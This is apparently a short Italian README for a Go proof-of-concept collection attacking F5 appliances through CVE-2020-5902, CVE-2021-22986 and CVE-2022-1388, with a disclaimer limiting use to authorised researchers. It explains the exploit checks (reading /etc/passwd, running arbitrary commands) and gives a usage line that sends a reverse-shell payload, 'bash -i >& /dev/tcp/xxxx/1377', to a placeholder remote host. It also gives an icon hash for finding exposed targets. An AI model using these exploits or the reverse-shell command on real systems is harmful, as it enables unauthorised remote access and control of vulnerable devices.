
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 Raccolta di POC
Scritto in Go, collezione di POC per CVE-2020-5902 CVE-2021-22986 CVE-2022-1388. In futuro verranno aggiunti altri POC per F5.
author:160team.west9B
Da utilizzare solo da ricercatori di sicurezza autorizzati, nel rispetto delle leggi sulla sicurezza informatica. Qualsiasi problema o conseguenza è sotto la vostra responsabilità, l'autore non è responsabile.
Collezione di POC F5:
CVE-2020-5902: la verifica utilizza il download arbitrario di file. Se viene restituito /etc/passwd, la vulnerabilità è presente.
CVE-2021-22986, CVE-2022-1388: il POC esegue di default il comando id. Se viene restituito {id}, la vulnerabilità è presente. È possibile utilizzare -c per comandi personalizzati.
usage: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

icon_hash="-335242539"